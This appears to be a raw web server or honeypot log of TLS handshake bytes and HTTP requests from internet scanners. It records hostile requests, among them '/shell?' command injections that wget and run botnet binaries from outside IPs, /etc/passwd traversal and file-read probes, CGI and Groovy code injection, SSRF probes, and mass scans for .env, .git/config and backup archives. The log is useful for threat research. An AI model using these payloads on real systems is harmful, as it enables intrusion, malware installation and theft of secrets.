3331\x16\x03\x01\x00{\x01\x00\x00w\x03\x03{\xE9]Dg\xEA^Y\x9E\xE1\xDD\xB3E~\xB0\xC3\xF21\x9C\xB2\x86\x08\xF8l~\xA4\x85A\xF3e\xA8.\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
3341\x16\x03\x01\x05\xA8\x01\x00\x05\xA4\x03\x03\xE4\xF4\xB8g\x7F\xE5R\xE7\x05>\xBF.shv/\xD5hR\xEF&\x9F\x81\x22f\x1Em\xF7\xD0\xDF\xC8\x9A \xC9\xE3\x0E_s\xA3L\x14\x9F8
3351\x16\x03\x01\x00\xEA\x01\x00\x00\xE6\x03\x03\xC2\xAA\xA4/H\xF8~\x8Dt\xC3yU\xE9
3361\x16\x03\x01\x00\xEA\x01\x00\x00\xE6\x03\x03\xD3q\xCC7\xFAs\x1D.\x86\x82\xC5=+`\xD5\xA4\xF8P\x5Cu\xA9\xDC\xC5v\xE7\x1E@J\x97T\xB3! \xD7\xD8a\xFE\xD3\xE7F)\xE2\x09l\x07ma
3371\x16\x03\x01\x00\x8B\x01\x00\x00\x87\x03\x03\xD6\xFA\xD1\x86q\xFD\x8D \xA16\xEA@k\xAD\xDC\xD0\xB5\x15\xE5Y\xC0\xEB1\xF3\x84\xE36\xE5\xE2K\x16\x0E\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
3381\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03\xE4\xCF\xCE&x\x5C#\xB0\xB5+\x82~O\x88D\xECV\xB6G\x06\x1D\xE2\xD7\x9D\xBC-\xB8\xED\xB4\x01u^ \xEF\x8DCx\xA0\xB2{7\xC2\xCB3\xE0&\x94*\xE45C\x0B\x8F\x99V\xFF\xAD\x05s&M\xC6\x0E\x5C\x0F\x00\xB6\x13\x02\x13\x03\x13\x01\xC0,\xC00\x00\xA3\x00\x9F\xCC\xA9\xCC\xA8\xCC\xAA\xC0\xAF\xC0\xAD\xC0\xA3\xC0\x9F\xC0]\xC0a\xC0W\xC0S\x00\xA7\xC0+\xC0/\x00\xA2\x00\x9E\xC0\xAE\xC0\xAC\xC0\xA2\xC0\x9E\xC0\x5C\xC0`\xC0V\xC0R\x00\xA6\xC0$\xC0(\x00k\x00j\xC0s\xC0w\x00\xC4\x00\xC3\x00m\x00\xC5\xC0#\xC0’\x00g\x00@\xC0r\xC0v\x00\xBE\x00\xBD\x00l\x00\xBF\xC0
3391\x16\x03\x03\x01\xA7\x01\x00\x01\xA3\x03\x03\x16\xF8\xE2\xCD\xAF\xD2\x0F\xE9
3401\x03\x00\x00.)\xE0\x00\x00\x00\x00\x00Cookie: mstshash=HWXFUSEW
3411\x16\x03\x03\x01\xA7\x01\x00\x01\xA3\x03\x03\xD2\xB1\xD4&\xFD\xDAv\xE3w&\xCE\x02\xFE\x0Ec\x9F\xCB\x12\xD1\x02\xF2\x89\x88\xD0d2 \xFB\x19X\xCC\xFB \x13\x8E,3\x1D\x1BH\xA0\xF6\xA4\xB63\x04\xAF\x02\xD9\x12\xEF2\xC9\x7Fc\xD9\xE7z\x16\xFFK\xC3\xD3\x22\xD8\x00\x8A\x00\x16\x003\x00g\xC0\x9E\xC0\xA2\x00\x9E\x009\x00k\xC0\x9F\xC0\xA3\x00\x9F\x00E\x00\xBE\x00\x88\x00\xC4\x00\x9A\xC0\x08\xC0\x09\xC0#\xC0\xAC\xC0\xAE\xC0+\xC0
3421\x16\x03\x03\x01\xA7\x01\x00\x01\xA3\x03\x03\xBB\xF9\x14t\xF4\xB0\xDA\x7F\xCD\xDE\x83\xD4-9,\xA2\x0F\x02-\x11>\xEB\xD2q\xEC\xEE\x8B\xEA?\xCC\x22
3431\x16\x03\x03\x01\xA7\x01\x00\x01\xA3\x03\x03\xC9[:\xFB\xBE\xA3\xB3_(C\x198\xF6\xDE.\x80\x7F1\x0E\xAC\xC0\xA5\x89g\xFDx \xDA6\xFA\x82\x83 \xB1\x8A\xA8\xFE\x1A\x10\x0E\xE0\xA1?\xBC\x8B\xE3\x0E\xA6\xE6\x22\xED\x9EB#\x83\xFD(\xD8\xE90_\xF6\x00\x01B\x00\x8A\x00\x16\x003\x00g\xC0\x9E\xC0\xA2\x00\x9E\x009\x00k\xC0\x9F\xC0\xA3\x00\x9F\x00E\x00\xBE\x00\x88\x00\xC4\x00\x9A\xC0\x08\xC0\x09\xC0#\xC0\xAC\xC0\xAE\xC0+\xC0
3441\x16\x03\x01\x00{\x01\x00\x00w\x03\x03@\xFD00\xCB\xDC\xF9\xC6\xAE\xC82’T\xE2\xA7U\xF0\xAE:\xCF\xB6\xCFG5\xB8\x0F\xDC\xDC\x95\xF6\xE5\xD4\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
3451\x16\x03\x01\x00\xE2\x01\x00\x00\xDE\x03\x03\x95\xD8bsE1L\xCA.\xA1\xBD\xAC\xF7\xC9\xCBB\xC7\xBE\xCDOR\xF8r\xE0\x1B\xBE\xFFE\x9F3\xA5\x19 <\xEFy\x940\x5C\xD6\xB9\xD5u5\xABS\x8C\x1C\xCF\x00\x91’\x8D\xE5\xDB.Oc\xF7\xA7\x83\xAARua\x00\x1A\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
3461\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03m:.yP,tS\x97\x15
3471\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03\xD3z\xB5:\xBCU2U\x1E\xE2\x15dWqC\xE8n\x0Ek`\xD7\x86\x1C3\xB5’\xF2v\xC2{5\xE5\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0’\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0
3481\x16\x03\x01\x00\x8A\x01\x00\x00\x86\x03\x03Pu\x88d7?\x0B\xA7eS.\xBAk\xE7g\x03u\x80!\xBE$\x9Ciu\xA2T\x8Eh\xD9Lgl\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
3491\x16\x03\x01\x00{\x01\x00\x00w\x03\x03C\x95\x87G\x08D\x16\xB64\x9D}
3501\x16\x03\x01\x00\xAC\x01\x00\x00\xA8\x03\x03\xE5\x10\xF3y*z&\x87t\x05\xABj\x06pH^\x89h9:\xD8\xF0_a[\xEB~\xA3>d\x09\x1F\x00\x008\xC0,\xC0
3511\x16\x03\x01\x00{\x01\x00\x00w\x03\x03qp\x87\x0C\xDFuWb\xE9_\x99\xAF.n5\xA6?c{r\x11{5\xDA~\xCA\x02\xAA*y\xE2\x91\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
3521\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xB0*\xA6\xA4\x90\xCA4\xF4\xB95&\x0F\xFE\x94\xE8\x04 kU\xEF\xC5\x06X\xE8\x0F\x9C.\x03\xF2Mo1\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
3531\x16\x03\x01\x00\xEA\x01\x00\x00\xE6\x03\x03\xCA\xD44:\x14\xC5sn\x89\xF5\x8D\xCE\x19\x0FS\xE2v\xF8{\xD2\x05\x8C\x1C\xBF\xA7K\xE2\xAA\xBC\x93w\x9F \xB7y\xD81\xED
3541GET /socket.io/1/?t=1742451740651 HTTP/1.1
3551\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xF6\x1D\x18m\x04\xEBD^\xED\xAB\xAC\xC9\x9C\x7F\xB9 o\xFE0T+4Q\xF1\x96\xFB\xC6\x80\xBB\x1B\xDA\xC3 ~\xC8\x8A\x85\x7F\x97&y]\x1C\x18\xE9\x18\x85\xFDD\x22`\x1A\xAD\x08J\x84l
3561\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x14\xDB\xAB\xD4\x8D\xB4’\x10\xD4\xFD\xED\xCAo
3571\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xEAj\xA3yfM\x15;\x8B\xDB\xCA\xA5{\x13A2\xF1\x9E\xFFe\xD2/\x00y\x1D\x8DRG#\xE46\x87 \xC0s4\x88\xA1\xB6\xC5\xBAEd\xA2\xCE\x8B\xCDc\x10v}\xCF\x22\xCCT\xA5\xCF\x8C\xB0\xA6\xA3l\xBEY\x16\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
3581GET /js/protocol.js HTTP/1.1
3591\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x84QD\xE4\xBBn\x11F\x15\x9B\x07\x0C\xCC\xD4\x15>Z\x1B\x8F_\x98\xD7Ha\xAB\xAE\xD5\x13*@X\xC0\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
3601GET /zd/mips HTTP/1.1
3611GET /zd/arc HTTP/1.1
3621GET /zd/i686 HTTP/1.1
3631GET /zd/mpsl HTTP/1.1
3641GET /zd/sh4 HTTP/1.1
3651GET /bin.sh HTTP/1.1
3661\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xDF]\x22\x92\x02.\x98\x9FB\x1Ao\xE0j\xC6\x86\x82)\xBE
3671GET /socket.io/1/?t=1742452491326 HTTP/1.1
3681GET /bins/ppc HTTP/1.1
3691GET /bins/spc HTTP/1.1
3701GET /bins/mpsl HTTP/1.1
3711GET /bins/x86 HTTP/1.1
3721GET /bins/sh4 HTTP/1.1
3731\x16\x03\x01\x00\xAC\x01\x00\x00\xA8\x03\x033\xAE\x85f\xBA\x81\xDC\xE1\x950
3741\x16\x03\x01\x00\xF2\x01\x00\x00\xEE\x03\x03\xB8\x9Cs\xD2V\xCE\xD5\x02\x8E7\xC3\xAEVR\x9A\xD7\xE4\xC6\xF7lH\xF16\xBC\x1D\xA4H\x0E\xD1\xED\x98\xAD )\x8ER;\x22{\x01\x88\x91gR\xD3\xA0\xE3\xE61
3751GET /shell?cd+/tmp;rm+-rf+*;wget+ http://157.245.200.182/Binarys/Nyx4r.arm;chmod+777+/tmp/Nyx4r.arm;sh+/tmp/Nyx4r.arm arm4.jaws HTTP/1.1
3761\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x98\xD4Kc\xC1\xDC\x09!\xA9\x05\x90\xE3\xF1a\xA6p\xF9\xA0\xB0\xC6F`W\xE7\xB1h\x93\xAA\x95\xF4\xB3\xAE\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
3771GET /xmldata?item=all HTTP/1.1
3781GET /main_arm HTTP/1.1
3791GET /main_m68k HTTP/1.1
3801\x16\x03\x01\x05\xA8\x01\x00\x05\xA4\x03\x03’
3811GET /.env.debug HTTP/1.1
3821GET /nabppc HTTP/1.1
3831GET /socket.io/1/?t=1742467167137 HTTP/1.1
3841GET /socket.io/1/?t=1742467154650 HTTP/1.1
3851\x16\x03\x01\x00\xF2\x01\x00\x00\xEE\x03\x03\x96\x05]{\x13T\x94t\xE4.\xDA\x09N\xFAa\xB9\xC1F\xB2\xE8\x1E\x9B_4\xD2\xBA\xCE\xC7\xB9h\xA9\x9B \x1E\xECW?)\x01e\xBD\x18\xD9\xDE\x14)\xCD\xB0NA?\x84\xECnO\x22\xC5\x9DO\xB5vCm\xEDA\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
3861\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x06\xAA,\xEDI\xA7M\x0F\xB6V\xE4\x17\xA9\xD4\xA0\xF8Bc4hFy\x83s\xF2\x9EZ\x02\xD3>\xB7\x0B\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
3871GET /jklm68k HTTP/1.1
3881GET /nabm68k HTTP/1.1
3891GET /app/config/.git/config HTTP/1.1
3901GET /data/config/.git/config HTTP/1.1
3911GET /m68k HTTP/1.1
3921GET /arm5 HTTP/1.1
3931GET /spc HTTP/1.1
3941\x16\x03\x03\x01\xA6\x01\x00\x01\xA2\x03\x032\xF8\x0B\xA8H\xC23\xA9\x19\x0F\x12\xFA\xDC \xBD\xD9-*6\x8B\x03\xFE\x92\x86GvO6~\xF4O2 7\xE1\xF1\x9D\x17>B\xF4\x1Fg\xC4\xE6\xDB\xB2\xE9\x94\x83\x83\xB4\xC1:\x0C\xD0\x22G\xDE7\xF7\xFFm\xD4\xEC\x00\x8A\x00\x16\x003\x00g\xC0\x9E\xC0\xA2\x00\x9E\x009\x00k\xC0\x9F\xC0\xA3\x00\x9F\x00E\x00\xBE\x00\x88\x00\xC4\x00\x9A\xC0\x08\xC0\x09\xC0#\xC0\xAC\xC0\xAE\xC0+\xC0
3951\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03G\xBFv&\x0B\xC2Y\xC8\x88M,\x90\x1ER\x07\xBA\x9F\xDB\x03+=R\xCD\x8F\xC4\xF0\xFF\xC1y\xD0\xB3\xF0 yV\x9B\x95\xA6\xAF!\xDC\xECE\xF2\x86\xDC
3961\x16\x03\x03\x01\xA6\x01\x00\x01\xA2\x03\x03>\xB1M\xE4d\x136A\xFE\xE0\x00\x9Do\xCB\xDD~
3971GET /.env.orig HTTP/1.1
3981GET /t/ppc HTTP/1.1
3991GET /t/aarch64 HTTP/1.1
4001GET /static/files/.git/config HTTP/1.1
4011\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x12\xE3\xED\xD5\xCC\xD9H\x9A\xF4\x00\x7F\xCF\x08\xA55j.j\xD0\xFEb\xE0\xEF\x82\xFF;*#\x84\xE8\xFB\x06 \x95jY\xC9\x19q-\xC0\xE8#\xAA\x15\xC4Ol\xDD\x18bY\xBA\xAF\x10\xB7\xE5\x96\x9B\xC0\x95\xACrq\xFB\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
4021\x16\x03\x01\x00\xAC\x01\x00\x00\xA8\x03\x03
4031\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x03\x9Asd\xFD\xF9\xEF})9\xF3\xA7b)\xBF\x9C\x13\x1E\x8E\x08\xB7\xFAf?\x027\xC3\x07\xF1<\xBFe \xDA\xD1\xA5\xCC\xF9\xDE\xBC.\xD76\xAE\x0E+\xAC\x11gn\xB9\xD0\x91\x8D
4041\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03\x1E [_ \xBF\xB7K\x9D\x027,_c\x02\xF0\xAD\xBE\x1A\xC3\xF3\xD6\xE4B\x92\xEE\xFA9\xB3t\x9B\x9C\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0’\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0
4051\x16\x03\x01\x05\xA8\x01\x00\x05\xA4\x03\x03\xBB\x83\xC3\x1F3VRw\xEF\xC1\xAA\xBCz)\x09Z=r\xDB\x00/\xCA\xA6
4061GET /system/config_menu.htm HTTP/1.1
4071GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
4081GET /Admin/Admin.aspx HTTP/1.1
4091POST /clients/MyCRL HTTP/1.1
4101GET /classes/common/busiFacade.php HTTP/1.1
4111\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xEDGT1\x97n\xAC\x9CN\xB8\xFCm\xBB\xAD.\x0CB\xA3\xA6\xAA\xB4!XK\x81\x22\x11q\xE6\xE7\xC3\x80\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
4121\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x83\xC7\xCDv\xB7C\xBB\x0E\x15\xAA}lz\x88\x22f=\x12u\x22\x1D\xE9\xD2\xCFHy\xFC\xC0\xC0\x02\xC5^\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
4131\x16\x03\x01\x00\x8B\x01\x00\x00\x87\x03\x03$P\xCB\xE9\x17\xF0K\xE58\xD7N3UP\x10\xBA<s\xC9X\xEB\xA6\x99\xA6\x88z\xA2\x82z\xDEWg\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
4141GET /GRWm HTTP/1.1
4151GET /cDqD HTTP/1.1
4161\x16\x03\x01\x00\xFA\x01\x00\x00\xF6\x03\x03\x0B\xBC\x85\x04&?\x02K\x18
4171\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03j\xB1,\xA8\x81\x11VE\xF3\xD1\xCEp\x98\x0CZ.\xA5\xAE\x8C\x1A\xC3$\x95\x97\x04\x9BP\x87:T\xF0\xB6 \xA3#;\x00\x02\x89\xA4.\x97Z\x1A-\x12SS\xDD$/\x9C\xD4\x87f\x81k\x16\xD3\xF7\x83\x12\xAB\xD3I\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
4181\x16\x03\x01\x00{\x01\x00\x00w\x03\x03Z\x92\xBC\x1B\xD5\x8A\x85\x22\x93\xB5S\xAA\x8F\x19\xB6h\xEA\xAB\xBE\xCE*\xA2j\x8C\xC0\xAB\xE0\xF2 ]-\xCB\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
4191GET /data.tar.gz HTTP/1.1
4201\x16\x03\x03\x01\xA6\x01\x00\x01\xA2\x03\x033\x10\xA5qZ47\xBBY\xCDp\xB0\x1D\xE8\x11n\x8F\x80\x9F\xB94\x08\xF1\xB9\xC4\xF8\x9D\x10\xDB=#\x5C \xA39\xF3\xB7\xD3k\x7F\x06\xA4\x06f\xE3r\x8A\xAD\x86\xAD\x04
4211\x16\x03\x03\x01\xA6\x01\x00\x01\xA2\x03\x03\x0C\xEF\x19\xD3\xAD/\x9Aa
4221\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xDCPA\x15Q?\x06\xDD\x91v\x1EJ\x18i\xD4e\x1Dt\x0C1\xBD\x7F\xD49\x9Av\xC8\xD1Q\xD1LG \x8A\xE2\xCA\xD6w\xD0\x1E\xAF9}\xA5\xD3\xCAk\x98\x8F\xD0s:c\xB3k`\xE5O\x93\xF0\x8FU$\x95\xFE\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
4231\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03\xDC'\xDE\xD6\x81D\xD0\xE6\x12\x14\x17To\xB3n$\xF6\xAE\xEEQQ\x8D\xA8\xD2\xE7\x86\xEA\x13H\xE7\x97 \xFE\xEB\xE4l\xF6^\x13-+_\xE0~\x025@#%ud3\xC7\xA5\xA8\x93\x8A\x17o\x1FP%i3\x00\xAE\x13\x02\x13\x03\x13\x01\xC0,\xC00\x00\xA3\x00\x9F\xCC\xA9\xCC\xA8\xCC\xAA\xC0\xAF\xC0\xAD\xC0\xA3\xC0\x9F\xC0]\xC0a\xC0W\xC0S\x00\xA7\xC0+\xC0/\x00\xA2\x00\x9E\xC0\xAE\xC0\xAC\xC0\xA2\xC0\x9E\xC0\x5C\xC0\xC0V\xC0R\x00\xA6\xC0$\xC0(\x00k\x00j\xC0s\xC0w\x00\xC4\x00\xC3\x00m\x00\xC5\xC0#\xC0’\x00g\x00@\xC0r\xC0v\x00\xBE\x00\xBD\x00l\x00\xBF\xC0
4241\x16\x03\x01\x00{\x01\x00\x00w\x03\x03 i\xFF\xAD
4251GET /__screenshot-error?file=/etc/passwd HTTP/1.1
4261GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1
4271GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27 HTTP/1.1
4281GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1
4291POST /classes/common/busiFacade.php HTTP/1.1
4301GET /php/ztp_gate.php/.js.map HTTP/1.1
4311GET /file=c:%5Cwindows%5Cwin.ini HTTP/1.1
4321GET /file=/etc/passwd HTTP/1.1
4331GET /interview?i=/etc/passwd HTTP/1.1
4341GET /device/config HTTP/1.1
4351GET /bin/bin.gz HTTP/1.1
4361\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03E\x10\x11\x87d.\xE5\x8EK\x11\x93\x04\xE4N\x12\xE1\xF1D\x09\xF0\xED763\x1E:\xE9n\x01\xFE\xC1\x00 \x92\x05\x0Bl_\x8D$\x9D\x98\x85J\x9CC\x84\xDB\x05\xE5\x9DC\xAE\xA5\xBD\xC7\xC6\x03l\xE3\xD7\xC4_\xF2*\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
4371GET /render/info.html HTTP/1.1
4381GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1
4391GET /access/set?param=enableapi&value=1 HTTP/1.1
4401GET /cslu/v1/scheduler/jobs HTTP/1.1
4411POST /task/submit/ HTTP/1.1
4421GET /filex/read-raw?url=http://oast.me&cut=1 HTTP/1.1
4431GET /file=http://oast.pro HTTP/1.1
4441GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
4451POST /index.php/display/status_zigbee HTTP/1.1
4461GET /api/v1/markdown/link:metadata?link=http://localhost:13042 HTTP/1.1
4471GET /bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20 HTTP/1.1
4481GET /unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css HTTP/1.1
4491GET /xxx.xxx.xxx.xxx.tar.gz HTTP/1.1
4501GET /old.tar.gz HTTP/1.1
4511\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03_\x9B\x8C\x14\x09c\xF8N{0\x1E!s\xA9K\x96\xC8\x89\x85\xEA\xA4\xE4Uw\xEEE\x9F~\x8A{\x1E7 \xB7\xA1\xC8\x11\x95\xC2\xE6\xE2\x90\xEB\x1A\xEAwM2\x95\x88.$\x83n\x19\xCD\x1F\xDE\x8F\xFD\xE4\x88\xA6\xDB\xBE\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
4521GET /upload.tar.gz HTTP/1.1
4531GET /bin/bin.tar.gz HTTP/1.1
4541GET /web.config.tar.gz HTTP/1.1
4551GET /portal.tar.gz HTTP/1.1
4561GET /source.tar.gz HTTP/1.1
4571GET /src.tar.gz HTTP/1.1
4581GET /bin.tar.gz HTTP/1.1
4591GET /html.tar.gz HTTP/1.1
4601GET /www.tar.gz HTTP/1.1
4611GET /web.tar.gz HTTP/1.1
4621GET /backup.tar.gz HTTP/1.1
4631GET /xxx.xxx.xxx.xxx.gz HTTP/1.1
4641GET /old.gz HTTP/1.1
4651GET /data.gz HTTP/1.1
4661GET /upload.gz HTTP/1.1
4671GET /web.config.gz HTTP/1.1
4681GET /portal.gz HTTP/1.1
4691GET /source.gz HTTP/1.1
4701GET /src.gz HTTP/1.1
4711GET /bin.gz HTTP/1.1
4721GET /html.gz HTTP/1.1
4731GET /www.gz HTTP/1.1
4741GET /web.gz HTTP/1.1
4751GET /backup.gz HTTP/1.1
4761GET /xxx.xxx.xxx.xxx.tar HTTP/1.1
4771GET /old.tar HTTP/1.1
4781GET /data.tar HTTP/1.1
4791GET /upload.tar HTTP/1.1
4801GET /bin/bin.tar HTTP/1.1
4811GET /web.config.tar HTTP/1.1
4821GET /portal.tar HTTP/1.1
4831GET /public_html/.env HTTP/1.1
4841GET /api/v2/.env HTTP/1.1
4851GET /project/.env HTTP/1.1
4861\x16\x03\x01\x00\xAC\x01\x00\x00\xA8\x03\x03@\xC04\xE6\x9D;\x89\x11m\x91\xCB\x95\xA5\x1F\x8B,U,\xEF3\xD8\x17\x9E\x91\xDF\x90\x94w\x08\x01n\xBE\x00\x008\xC0,\xC0
4871GET /shell?cd+/tmp;rm+-rf+*;wget+http://180.106.105.231:44989/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
4881GET /backend/src/.env HTTP/1.1
4891GET /sample.env HTTP/1.1
4901GET /phpinfos/ HTTP/1.1
4911GET /cms/.env.prod HTTP/1.1
4921GET /.env~ HTTP/1.1
4931GET /admincp/.env HTTP/1.1
4941GET /security/.env HTTP/1.1
4951GET /html.tar HTTP/1.1
4961GET /www.tar HTTP/1.1
4971GET /web.tar HTTP/1.1
4981GET /backup.tar HTTP/1.1
4991GET /xxx.xxx.xxx.xxx.7z HTTP/1.1
5001GET /old.7z HTTP/1.1
5011GET /data.7z HTTP/1.1
5021GET /upload.7z HTTP/1.1
5031GET /bin/bin.7z HTTP/1.1
5041GET /web.config.7z HTTP/1.1
5051GET /portal.7z HTTP/1.1
5061GET /source.7z HTTP/1.1
5071GET /src.7z HTTP/1.1
5081GET /downloads/.env HTTP/1.1
5091GET /products/.env HTTP/1.1
5101GET /xxx.xxx.xxx.xxx.rar HTTP/1.1
5111GET /old.rar HTTP/1.1
5121GET /data.rar HTTP/1.1
5131GET /upload.rar HTTP/1.1
5141GET /bin/bin.rar HTTP/1.1
5151GET /web.config.rar HTTP/1.1
5161GET /portal.rar HTTP/1.1
5171GET /source.rar HTTP/1.1
5181GET /src.rar HTTP/1.1
5191GET /bin.rar HTTP/1.1
5201GET /html.rar HTTP/1.1
5211\x16\x03\x01\x00\xAC\x01\x00\x00\xA8\x03\x03\x8D>\xEDf\x96(bX\xFE\x8D\x00\xBB\xCB\xA9\xD3\xCB.\x86\xF9-}\x07\xA4\x18\xC8\xF5=0Q{r\xF0\x00\x008\xC0,\xC0
5221GET /source.tar HTTP/1.1
5231GET /src.tar HTTP/1.1
5241GET /bin.tar HTTP/1.1
5251GET /upload.zip HTTP/1.1
5261GET /bin/bin.zip HTTP/1.1
5271GET /web.config.zip HTTP/1.1
5281GET /portal.zip HTTP/1.1
5291GET /source.zip HTTP/1.1
5301GET /src.zip HTTP/1.1
5311GET /bin.zip HTTP/1.1
5321GET /html.zip HTTP/1.1
5331GET /www.zip HTTP/1.1
5341GET /web.zip HTTP/1.1
5351\x16\x03\x01\x00\xEA\x01\x00\x00\xE6\x03\x03\xCAS\x8F~\xB7s
5361GET /bin.7z HTTP/1.1
5371GET /html.7z HTTP/1.1
5381GET /www.7z HTTP/1.1
5391GET /web.7z HTTP/1.1
5401GET /backup.7z HTTP/1.1
5411\x16\x03\x01\x00\xAC\x01\x00\x00\xA8\x03\x03\xB1\x88{\xA9\xC1MG\x14\x84\x90b\x90\xF5\x8E\x06]\xA4+,\x8B\xE8\xAA\xA2#\x1C7\x814\xB9\xDE?I\x00\x008\xC0,\xC0
5421\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xD1\x12\x05D’sv\xD4\xF9\xA2\x9F6w\x9D\xF3\xD0\x87\xD5\xE5\xCB\xE2\x82\xBA.M^\x05\xFE\xA0\x15\xA4’\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
5431\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x01\xBB\xA4\x05\xF0\xDD\x15>17\xF7s<\x10\xBE\xD4ZD\xE9\xE0lX\x8C\x92\xF00\x08q\x80\x1B\xD4\xD7 \x05\x93:\x97
5441\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03Ae,K\xFE\x04~\xD1\xD2\x18\xEF\x15\xD5\xF7qA\x227\x9F6X\xFF\xA0\x95\xF3\x8E\x9CQqHp I\xFF\x996\xA2\xCDh\xD2\xF0'\x22\xD6\x90\xB2\x8AlF\x06\xB5\xBE+b\xAC\xF3s\xC8\x83\x83\xA8?1\x00\xAE\x13\x02\x13\x03\x13\x01\xC0,\xC00\x00\xA3\x00\x9F\xCC\xA9\xCC\xA8\xCC\xAA\xC0\xAF\xC0\xAD\xC0\xA3\xC0\x9F\xC0]\xC0a\xC0W\xC0S\x00\xA7\xC0+\xC0/\x00\xA2\x00\x9E\xC0\xAE\xC0\xAC\xC0\xA2\xC0\x9E\xC0\x5C\xC0`\xC0V\xC0R\x00\xA6\xC0$\xC0(\x00k\x00j\xC0s\xC0w\x00\xC4\x00\xC3\x00m\x00\xC5\xC0#\xC0’\x00g\x00@\xC0r\xC0v\x00\xBE\x00\xBD\x00l\x00\xBF\xC0
5451\x16\x03\x01\x00{\x01\x00\x00w\x03\x03d\x02\xFA\xEDL\x9D\xDB\x1A\xC7p\x07\x89n\xFA\x99S\xC5\xB4\x80\x8C\x8AX)c\x12.\x81\x17\x0E\xB1\xC6:\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
5461\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03g\x816\x9D\x06\xDD\x03\xFA$*\x01\xAE\x04\xD5c\xFEr\xB9
